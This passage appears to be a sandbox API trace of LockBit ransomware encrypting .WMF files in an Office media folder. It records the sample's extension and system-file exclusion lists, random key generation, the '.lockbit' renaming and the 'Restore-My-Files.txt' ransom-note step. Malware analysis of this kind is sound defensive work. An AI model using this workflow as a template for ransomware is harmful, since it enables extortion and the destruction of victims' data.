lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0202.502] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0202.503] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0202.503] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0202.504] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0202.504] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0202.504] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0202.504] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0202.504] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0202.504] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0202.504] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0202.504] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0202.504] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0202.504] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0202.504] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0202.504] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.504] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0202.504] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0202.504] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0202.504] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0202.504] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18255_.WMF") returned 1 [0202.504] lstrcmpiW (lpString1="ntldr", lpString2="BD18255_.WMF") returned 1 [0202.504] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18255_.WMF") returned 1 [0202.504] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18255_.WMF") returned 1 [0202.504] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18255_.WMF") returned -1 [0202.504] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18255_.WMF") returned 1 [0202.504] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18255_.WMF") returned 1 [0202.504] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0202.504] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18255_.WMF") returned=".WMF" [0202.504] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0202.504] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0202.505] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0202.505] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0202.505] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18255_.WMF.lockbit") returned 79 [0202.505] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18255_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18255_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0202.507] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0202.507] malloc (_Size=0x40068) returned 0x3df0008 [0202.507] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2082) returned 1 [0202.507] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.508] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0202.508] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.508] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0202.508] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0202.513] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18255_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18255_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.513] malloc (_Size=0xb4) returned 0x1fa2ed8 [0202.513] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0xc0000008 [0202.513] free (_Block=0x1fa2ed8) [0202.513] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18255_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0202.513] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0202.513] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0202.514] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7a21700, ftCreationTime.dwHighDateTime=0x1bdcf1c, ftLastAccessTime.dwLowDateTime=0xbcce4400, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd7a21700, ftLastWriteTime.dwHighDateTime=0x1bdcf1c, nFileSizeHigh=0x0, nFileSizeLow=0x8ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18256_.WMF", cAlternateFileName="")) returned 1 [0202.514] lstrcmpiW (lpString1=".", lpString2="BD18256_.WMF") returned -1 [0202.514] lstrcmpiW (lpString1="..", lpString2="BD18256_.WMF") returned -1 [0202.514] PathFindExtensionW (pszPath="BD18256_.WMF") returned=".WMF" [0202.514] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0202.514] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0202.514] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0202.514] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0202.514] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0202.514] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0202.514] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0202.514] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0202.514] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0202.514] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0202.514] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0202.514] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0202.514] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0202.514] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0202.514] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0202.514] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0202.514] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0202.514] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0202.514] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0202.514] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0202.514] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0202.514] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0202.514] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0202.515] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0202.515] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18256_.WMF") returned 1 [0202.515] lstrcmpiW (lpString1="ntldr", lpString2="BD18256_.WMF") returned 1 [0202.515] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18256_.WMF") returned 1 [0202.516] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18256_.WMF") returned 1 [0202.516] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18256_.WMF") returned -1 [0202.516] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18256_.WMF") returned 1 [0202.516] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18256_.WMF") returned 1 [0202.516] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0202.516] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18256_.WMF") returned=".WMF" [0202.516] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0202.516] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0202.516] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0202.516] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0202.516] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0202.516] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0202.516] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0202.516] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0202.516] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0202.516] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0202.516] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0202.516] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0202.516] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0202.516] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0202.516] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0202.516] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0202.516] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0202.516] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0202.516] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0202.516] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0202.517] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0202.517] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0202.517] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0202.517] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0202.517] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0202.517] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0202.517] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0202.517] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0202.517] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18256_.WMF.lockbit") returned 79 [0202.517] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18256_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18256_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0202.518] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0202.518] malloc (_Size=0x40068) returned 0x3df0008 [0202.518] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2220) returned 1 [0202.519] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.519] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0202.519] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.520] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0202.520] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0202.524] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18256_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18256_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.524] malloc (_Size=0xb4) returned 0x1fa2ed8 [0202.525] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0xc0000008 [0202.525] free (_Block=0x1fa2ed8) [0202.525] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18256_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0202.525] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0202.525] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0202.525] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd83b2900, ftCreationTime.dwHighDateTime=0x1bdfe4b, ftLastAccessTime.dwLowDateTime=0xbcce4400, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd83b2900, ftLastWriteTime.dwHighDateTime=0x1bdfe4b, nFileSizeHigh=0x0, nFileSizeLow=0x12ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18257_.WMF", cAlternateFileName="")) returned 1 [0202.525] lstrcmpiW (lpString1=".", lpString2="BD18257_.WMF") returned -1 [0202.525] lstrcmpiW (lpString1="..", lpString2="BD18257_.WMF") returned -1 [0202.525] PathFindExtensionW (pszPath="BD18257_.WMF") returned=".WMF" [0202.525] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0202.525] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0202.525] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0202.525] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0202.525] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0202.525] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0202.525] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0202.525] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0202.525] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0202.525] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0202.525] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0202.525] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0202.526] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0202.526] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0202.527] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0202.527] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0202.527] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.527] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0202.527] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0202.527] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0202.527] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0202.527] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18257_.WMF") returned 1 [0202.527] lstrcmpiW (lpString1="ntldr", lpString2="BD18257_.WMF") returned 1 [0202.527] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18257_.WMF") returned 1 [0202.527] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18257_.WMF") returned 1 [0202.527] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18257_.WMF") returned -1 [0202.527] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18257_.WMF") returned 1 [0202.527] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18257_.WMF") returned 1 [0202.527] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0202.527] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18257_.WMF") returned=".WMF" [0202.527] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0202.527] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0202.527] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0202.527] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0202.527] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0202.527] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0202.527] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0202.527] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0202.527] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0202.527] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0202.527] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0202.528] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0202.528] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0202.528] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0202.528] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0202.528] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0202.528] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0202.528] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0202.528] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0202.528] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0202.528] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0202.528] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0202.528] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0202.528] lstrcmpiW (lpString1=".sql", 